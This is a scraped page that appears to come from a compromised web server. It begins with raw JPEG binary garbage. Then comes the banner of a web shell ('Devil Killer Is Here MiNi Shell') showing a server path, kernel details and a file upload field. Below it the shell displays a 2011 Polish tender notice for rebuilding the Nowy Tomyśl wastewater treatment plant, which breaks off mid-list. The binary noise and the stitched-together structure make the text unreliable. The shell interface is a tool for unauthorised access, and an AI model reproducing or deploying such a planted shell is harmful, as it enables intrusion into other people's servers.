JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110214/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110214/21802-N-2011.html

<p class="kh_header"><b>Nowy Tomyśl: Kompleksowe zagospodarowanie ścieków w zlewni rzeki Obry - Gmina Nowy Tomyśl.</b><br>
<b>Numer ogłoszenia: 21802 - 2011; data zamieszczenia: 14.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Wodociągów i Kanalizacji w Nowym Tomyślu Spółka z o.o. , ul. Targowa 8, 64-300 Nowy Tomyśl, woj. wielkopolskie, tel. 061 4422091, faks 0-61 44-22-091 wew. 50.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pwik.nowytomysl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Przedsiębiorstwo sektorowe.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowe zagospodarowanie ścieków w zlewni rzeki Obry - Gmina Nowy Tomyśl..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot niniejszego zamówienia stanowi  -Przebudowa i rozbudowa miejskiej oczyszczalni ścieków w Nowym Tomyślu-  w formule -zaprojektuj i wykonaj- obejmująca następujące obiekty na terenie oczyszczalni ścieków w Nowym Tomyślu:

Budynek krat z punktem zlewnym ścieków dowożonych
Główna przepompownia ścieków
Piaskownik podłużny przedmuchiwany
Zbiornik retencyjny  osadnik Imhoffa
Blok biologicznego oczyszczania ścieków
Komora pomiaru ilości ścieków oczyszczonych
Wylot ścieków oczyszczonych do odbiornika
Budynek separatora piasku
Zbiornik magazynowy osadu nadmiernego
Budynek odwadniania osadu
Plac składowy osadu odwodnionego
Wiata kompostowni
Wiata magazynowa kompostu dojrzałego
Plac składowy gałęzi
Zasiek składowy na zrębki
Wyposażenie kompostowni: przerzucarka, ładowarka, rozdrabniarka, sito bębnowe
Biofiltry   instalacja hermetyzacji
Komory połączeniowe ścieków
Komora wodomierzowa
Regulacja rzeki Szarka
Budynek techniczno laboratoryjny
Magazyn drewna opałowego
Budynek trafostacji i agregatu prądotwórczego
Budynek rozdzielni NN wraz z magazynem technicznym 
Rozbiórka obiektów istniejących i wywóz osadu z lagun i poletek
Sieci międzyobiektowe
Kanalizacja kablowe (linie kablowe nn, sterownicze, sygnalizacyjne i pomiarowe)AKPIA
Drogi, place i chodniki projektowane, ukształtowanie terenu, zieleń
Ogrodzenie terenu oczyszczalni
Odwodnienie terenu
Wyposażenie dodatkowe oczyszczalni:
 wyposażenie laboratorium
 wózek widłowy
 samochód z systemem hakowym
Rozruch oczyszczalni


Uzyskanie wszelkich formalności, zezwoleń, dopuszczeń związanych z realizacją zadania leży po stronie wykonawcy. 
Materiały z rozbiórki Wykonawca na własny koszt podda odzyskowi lub unieszkodliwi, za wyjątkiem materiałów nadających się do ponownego wbudowania, które Wykonawca protokolarnie przekaże do dyspozycji Zamawiającemu.
Urządzenia z rozbiórki nadające się do ponownego wbudowania Wykonawca protokolarnie przekaże do dyspozycji Zamawiającemu.
Koszt zabezpieczenia terenu robót musi być włączony w cenę oferty zamówienia.
Koszt wykonania dróg tymczasowych niezbędnych do realizacji zadania leżą po stronie Wykonawcy Robót i powinny zostać uwzględnione w kosztach ceny oferty.
Rozruch mechaniczny, hydrauliczny i technologiczny oczyszczalni ścieków oraz koszty z tym związane leżą po stronie Wykonawcy.
Wykonawca przedstawi wymagane wyniki badań laboratoryjnych oraz przekaże protokół z rozruchu technologicznego 
Koszty mediów zużytych w trakcie rozruchu obiektu, badania i analizy laboratoryjne niezbędne dla prawidłowego przeprowadzenia rozruchu, oraz wynagrodzenia członków Komisji Rozruchowej, Wykonawca winien uwzględnić w cenie oferty wykonania Kontraktu.
Materiały użyte do wykonania zadania muszą posiadać deklarację zgodności lub certyfikat zgodności z Polską Normą lub aprobatą techniczną,  w przypadku braku Polskich Norm przenoszących europejskie normy zharmonizowane. 
Aprobata materiałów powinna być dokonana przez Inżyniera Kontraktu przed ich wmontowaniem.
Roboty na oczyszczalni ścieków realizowane będą przez Wykonawcę w sposób umożliwiający ciągłą pracę istniejącej oczyszczalni.
Wykonawca zobowiązany jest wykonać inspekcję telewizyjną CCTV kanałów grawitacyjnych sieci międzyobiektowych. Inspekcję telewizyjną należy wykonać zgodnie z normą PN.EN 13508.2 z grudnia 2006 r. Na odbiorze przedstawić wyniki kontroli kanałów wraz płytą CD..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.25.21.00-0, 45.23.30.00-0, 45.31.00.00-0, 45.33.10.00-0, 71.32.20.00-0, 45.23.00.00-0, 45.22.00.00-0, 45.23.24.60-0, 71.32.00.00-0, 45.21.00.00-0, 45.11.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 48.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy Wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium w wysokości:

800.000	zł 

słownie: osiemset tysięcy złotych 

2. Forma wadium.

1)	Wadium może być wniesione w następujących formach:
a)	pieniądzu;
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)	gwarancjach bankowych;
d)	gwarancjach ubezpieczeniowych;
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. 2007 nr 42, poz. 275).

2)	W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy:
a)	nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib, oznaczenie postępowania, którego gwarancja lub poręczenie dotyczy;
b)	określenie wierzytelności, która ma być zabezpieczona gwarancją,
c)	kwotę gwarancji lub poręczenia;,
d)	termin ważności gwarancji lub poręczenia (który nie może być krótszy niż termin związania Wykonawcy złożona przez niego ofertą)
e)	zobowiązanie gwaranta do: zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 u.p.z.p. nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 lub pełnomocnictw, lub Wykonawca, którego ofertę wybrano:
-odmówił podpisania umowy na warunkach określonych we ofercie, lub
-	nie wniósł zabezpieczenia należytego wykonania umowy, lub
-	zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy;</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>brak opisu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a wykazując, że wykonali w okresie ostatnich 5 lat przed upływem terminu
składania ofert (a jeżeli okres prowadzenia działalności jest krótszy w tym okresie), co najmniej: 
dwie roboty budowlane  polegającą na zaprojektowaniu i wybudowaniu, rozbudowaniu, przebudowaniu lub modernizacji oczyszczalni ścieków o przepustowości min 3.000 m3/d. Wykonawca nie może sumować przepustowości kilku robót o mniejszym zakresie dla uzyskania wymaganej wartości porównywalnej .
Zamawiający uzna za spełnienie powyższego warunku, jeśli roboty, o których mowa powyżej, obejmowały co najmniej część mechaniczną, część biologiczną oraz część osadową oczyszczalni ścieków. Roboty powinny być zakończone - powinien być dla tych robót spisany protokół odbioru końcowego lub Świadectwo Przejęcia, potwierdzający przejęcie oczyszczalni do eksploatacji oraz uzyskanie przez oczyszczalnie zakładanego efektu ekologicznego. 
W przypadku spełnienia powyższych warunków wykonawca wypełni i dołączy do oferty załącznik nr 6a

lub 

wykazać w okresie ostatnich 5 lat przed dniem wszczęcia postępowania, a jeżeli
okres prowadzenia działalności jest krótszy w tym okresie, co najmniej dwie roboty
budowlane  polegającą na wybudowaniu, rozbudowaniu, przebudowaniu lub 
modernizacji oczyszczalni ścieków o przepustowości min 3.000 m3 na d. Wykonawca
nie może sumować przepustowości kilku robót o mniejszym zakresie dla uzyskania
wymaganej wartości porównywalnej oraz wykazać w okresie ostatnich 3 lat przed  
upływem  terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy 
w tym okresie dwie usługi polegające na zaprojektowaniu budowy, rozbudowy, 
przebudowy lub modernizacji oczyszczalni ścieków o przepustowości min. 3.000 
m3 na d. Wykonawca nie może sumować przepustowości kilku robót o mniejszym 
zakresie dla uzyskania wymaganej wartości porównywalnej .
Zamawiający uzna za spełnienie powyższego warunku, jeśli:
	- roboty, o których mowa powyżej, obejmowały co najmniej część mechaniczną, część biologiczną oraz część osadową oczyszczalni ścieków. Roboty powinny być zakończone - powinien być dla tych robót spisany protokół odbioru końcowego lub Świadectwo Przejęcia, potwierdzający przejęcie oczyszczalni do eksploatacji oraz uzyskanie przez oczyszczalnię zakładanego efektu ekologicznego.
	- prace projektowe, o których mowa powyżej obejmowały co najmniej część mechaniczną, część biologiczną oraz część osadową oczyszczalni ścieków. 
Prace projektowe powinny być zakończone - powinien być dla tych robót spisany 
protokół odbioru końcowego bez zastrzeżeń.  . 

-Wykaz robót budowlanych- oraz -Wykaz prac projektowych- wykonanych w okresie ostatnich pięciu lat   trzech lat (odpowiednio dla robót - projektów) przed upływem terminu składania ofert, a jeżeli okres prowadzenia jest krótszy w tym okresie sporządzony według wzoru stanowiącego załącznik nr 6a oraz załącznik 6b do niniejszej SIWZ oraz dokumenty potwierdzające, że roboty - usługi te zostały wykonane z należytą starannością, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
	Zaleca się, aby przedkładane dokumenty potwierdzające, że wykonane przez Wykonawców roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone zawierały, co najmniej:
1.	wskazanie, że Wykonawca składający ofertę w niniejszym postępowaniu realizował roboty których dokumenty dotyczą,
2.	wskazanie podmiotu, na rzecz którego realizowane były roboty,
3.	wskazanie rodzaju (zakresu) robót,
4.	wskazanie daty wykonania (rozpoczęcia i zakończenia),
5.	wskazanie miejsca wykonania,
6.	opinię podmiotu wskazanego powyżej w poz.2 stwierdzającą, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone, a także że oczyszczalnia została przejęta do eksploatacji i uzyskała zakładany efekt ekologiczny.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>brak opisu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	posiadać średnio roczne zatrudnienie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, w wysokości min. 40 zatrudnionych w każdym kolejnym roku.
b)	posiadać średnio roczną liczebność personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, w wysokości min. 7 osób w każdym kolejnym roku.

c) wykazać się osobami (kadrą), które będą uczestniczyły w wykonaniu niniejszego zamówienia (wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia niezbędnych do wykonania zamówienia, a także zakresu wykonywania przez nich czynności oraz informacją o podstawie do dysponowania tymi osobami), tj :
1. Przedstawiciel Wykonawcy - Kierownik Kontraktu (Ekspert Nr 1) - 1 osoba, który posiada następujące kwalifikacje:

-	wykształcenie wyższe 
-	wykazane doświadczenie w zarządzaniu przynajmniej jednym kontraktem na roboty budowlane o wartości minimum 10.000.000 PLN brutto z zakresu gospodarki wodno-ściekowej; 
-	znajomość języka polskiego - Zamawiający dopuszcza zatrudnienie na własny koszt przez Wykonawcę tłumacza języka polskiego, zapewniającego stałe i biegłe tłumaczenie w kontaktach między Zamawiającym, a Wykonawcą. W takiej sytuacji Wykonawca powinien w ofercie zobowiązać się, iż zatrudni na własny koszt tłumacza języka polskiego.

2. Projektant - Kierownik Zespołu Projektowego (Ekspert Nr 2) - 1 osoba - branży instalacyjno-sanitarnej, który posiada następujące kwalifikacje:

-	łącznie, co najmniej 5 lat doświadczenia zawodowego, licząc od daty uzyskania uprawnień, w tym doświadczenie zawodowe w zaprojektowaniu co najmniej dwóch pełnych dokumentacji technicznych (obejmujących opracowanie projektów budowlanych i projektów wykonawczych) obiektów oczyszczalni ścieków o przepustowości min. 3.000 m3/d każda, samodzielnie lub jako członek zespołu projektowego; 
-	uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów uprawniające do projektowania w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,
-	przynależność do właściwej Izby Samorządu Zawodowego potwierdzona stosownym zaświadczeniem wydanym przez tę jednostkę,
-	znajomość języka polskiego - Zamawiający dopuszcza zatrudnienie na własny koszt przez Wykonawcę tłumacza języka polskiego, zapewniającego stałe i biegłe tłumaczenie w kontaktach między Zamawiającym, a Wykonawcą. W takiej sytuacji Wykonawca powinien w ofercie zobowiązać się, iż zatrudni na własny koszt tłumacza języka polskiego.

3. Projektant branży sanitarnej (Ekspert Nr 3) - 1 osoba, który posiada następujące kwalifikacje:

-	łącznie, co najmniej 5 lat doświadczenia zawodowego, licząc od daty uzyskania uprawnień, w tym doświadczenie zawodowe w zaprojektowaniu co najmniej jednej kompostowni, 
-	uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów uprawniające do projektowania w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,
-	przynależność do właściwej Izby Samorządu Zawodowego potwierdzona stosownym zaświadczeniem wydanym przez tę jednostkę,
-	znajomość języka polskiego - Zamawiający dopuszcza zatrudnienie na własny koszt przez Wykonawcę tłumacza języka polskiego, zapewniającego stałe i biegłe tłumaczenie w kontaktach między Zamawiającym, a Wykonawcą. W takiej sytuacji Wykonawca powinien w ofercie zobowiązać się, iż zatrudni na własny koszt tłumacza języka polskiego.

4. Projektant branży konstrukcyjnej (Ekspert Nr 4) - 1 osoba, który posiada następujące kwalifikacje:

-	łącznie, co najmniej 5 lat doświadczenia zawodowego, licząc od daty uzyskania uprawnień, 
-	uprawnienia budowlane do projektowania w specjalności konstrukcyjno-budowlanej bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów uprawniające do projektowania w zakresie branży konstrukcyjno-budowlanej dla zakresu będącego przedmiotem niniejszego zamówienia;
-	przynależność do właściwej Izby Samorządu Zawodowego potwierdzona stosownym zaświadczeniem wydanym przez tę jednostkę,
-	znajomość języka polskiego - Zamawiający dopuszcza zatrudnienie na własny koszt przez Wykonawcę tłumacza języka polskiego, zapewniającego stałe i biegłe tłumaczenie w kontaktach między Zamawiającym, a Wykonawcą. W takiej sytuacji Wykonawca powinien w ofercie zobowiązać się, iż zatrudni na własny koszt tłumacza języka polskiego.

5. Projektant branży elektrycznej (Ekspert Nr 5) - 1 osoba, który posiada następujące kwalifikacje:

-	łącznie, co najmniej 5 lat doświadczenia zawodowego, licząc od daty uzyskania uprawnień, 
-	uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów uprawniające do projektowania w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych i elektroenergetycznych;
-	przynależność do właściwej Izby Samorządu Zawodowego potwierdzona stosownym zaświadczeniem wydanym przez tę jednostkę,
-	znajomość języka polskiego - Zamawiający dopuszcza zatrudnienie na własny koszt przez Wykonawcę tłumacza języka polskiego, zapewniającego stałe i biegłe tłumaczenie w kontaktach między Zamawiającym, a Wykonawcą. W takiej sytuacji Wykonawca powinien w ofercie zobowiązać się, iż zatrudni na własny koszt tłumacza języka polskiego.

6. Kierownik Budowy (Ekspert Nr 6) - 1 osoba, który posiada następujące kwalifikacje:

- łącznie co najmniej 10 lat doświadczenia zawodowego, w tym 5 lat doświadczenia (licząc od dnia uzyskania uprawnień) na stanowisku kierownika budowy, w tym pełnienie funkcji kierownika budowy przy realizacji co najmniej jednej budowy lub przebudowy oczyszczalni ścieków o przepustowości min. 3.000 m3/d,
- uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej lub w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, a które uprawniają do pełnienia funkcji kierownika budowy w zakresie konstrukcyjno-budowlanym lub w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,
- przynależność do właściwej Izby Samorządu Zawodowego potwierdzona stosownym zaświadczeniem wydanym przez tę jednostkę,
znajomość języka polskiego - Zamawiający dopuszcza zatrudnienie na własny koszt przez Wykonawcę tłumacza języka polskiego, zapewniającego stałe i biegłe tłumaczenie w kontaktach między Zamawiającym, a Wykonawcą. W takiej sytuacji Wykonawca powinien w ofercie zobowiązać się, iż zatrudni na własny koszt tłumacza języka.

7. Kierownik Robót Sanitarnych (Ekspert Nr 7), który posiada następujące kwalifikacje:

- łącznie co najmniej 5 lat doświadczenia zawodowego, w tym 3 lata doświadczenia (licząc od dnia uzyskania uprawnień) na stanowisku kierownika robót sanitarnych, w tym pełnienie funkcji kierownika robót sanitarnych nad realizacją co najmniej jednej budowy lub przebudowy oczyszczalni ścieków o przepustowości min. 3.000 m3/d,
- uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, a które uprawniają do pełnienia funkcji kierownika robót sanitarnych w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,
- przynależność do właściwej Izby Samorządu Zawodowego potwierdzona stosownym zaświadczeniem wydanym przez tę jednostkę,
- znajomość języka polskiego - Zamawiający dopuszcza zatrudnienie na własny koszt przez Wykonawcę tłumacza języka polskiego, zapewniającego stałe i biegłe tłumaczenie w kontaktach między Zamawiającym, a Wykonawcą. W takiej sytuacji Wykonawca powinien w ofercie zobowiązać się, iż zatrudni na własny koszt tłumacza języka polskiego.

W przypadku, gdy Wykonawca wskaże do realizacji zamówienia Kierownika Budowy posiadającego uprawnienia w specjalności instalacyjnej, Zamawiający dopuszcza pełnienie funkcji kierownika budowy i kierownika robót sanitarnych przez tą samą osobę.


8. Kierownik Robót Budowlanych (Ekspert Nr 8), który posiada następujące kwalifikacje:

-	łącznie co najmniej 5 lat doświadczenia zawodowego, w tym 3 lata doświadczenia na stanowisku kierownika robót budowlanych,
-	uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, a które uprawniają do pełnienia funkcji kierownika robót w branży konstrukcyjno-budowlanej,
-	przynależność do właściwej Izby Samorządu Zawodowego potwierdzona stosownym zaświadczeniem wydanym przez tę jednostkę,
-	znajomość języka polskiego - Zamawiający dopuszcza zatrudnienie na własny koszt przez Wykonawcę tłumacza języka polskiego, zapewniającego stałe i biegłe tłumaczenie w kontaktach między Zamawiającym, a Wykonawcą. W takiej sytuacji Wykonawca powinien w ofercie zobowiązać się, iż zatrudni na własny koszt tłumacza języka polskiego.

W przypadku, gdy Wykonawca wskaże do realizacji zamówienia Kierownika Budowy posiadającego uprawnienia w specjalności konstrukcyjno-budowlanej, Zamawiający dopuszcza pełnienie funkcji kierownika budowy i kierownika robót budowlanych przez tą samą osobę.

9. Kierownik Robót Elektrycznych i AKPIA (Ekspert Nr 9), który posiada następujące kwalifikacje:

-	łącznie, co najmniej 5 lat doświadczenia zawodowego, w tym 3 lata doświadczenia (licząc od dnia uzyskania uprawnień) na stanowisku kierownika robót elektrycznych,
-	uprawnienia budowlane do kierowania robotami elektrycznymi w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, a które uprawniają do pełnienia funkcji kierownika robót elektrycznych w zakresie instalacji i urządzeń elektrycznych elektroenergetycznych,
-	przynależność do właściwej Izby Samorządu Zawodowego potwierdzona stosownym zaświadczeniem wydanym przez tę jednostkę,
-	znajomość języka polskiego - Zamawiający dopuszcza zatrudnienie na własny koszt przez Wykonawcę tłumacza języka polskiego, zapewniającego stałe i biegłe tłumaczenie w kontaktach między Zamawiającym, a Wykonawcą. W takiej sytuacji Wykonawca powinien w ofercie zobowiązać się, iż zatrudni na własny koszt tłumacza języka polskiego.

10.  Technolog (Ekspert Nr 10), który posiada  następujące kwalifikacje:

- łącznie, co najmniej 5 lat doświadczenia zawodowego, w tym 3 lata doświadczenia na stanowisku - technologa oczyszczania ścieków lub specjalisty ds. rozruchów oczyszczalni ścieków, w tym uczestnictwo w przynajmniej jednym rozruchu oczyszczalni ścieków o przepustowości min. 3.000 m3/d,
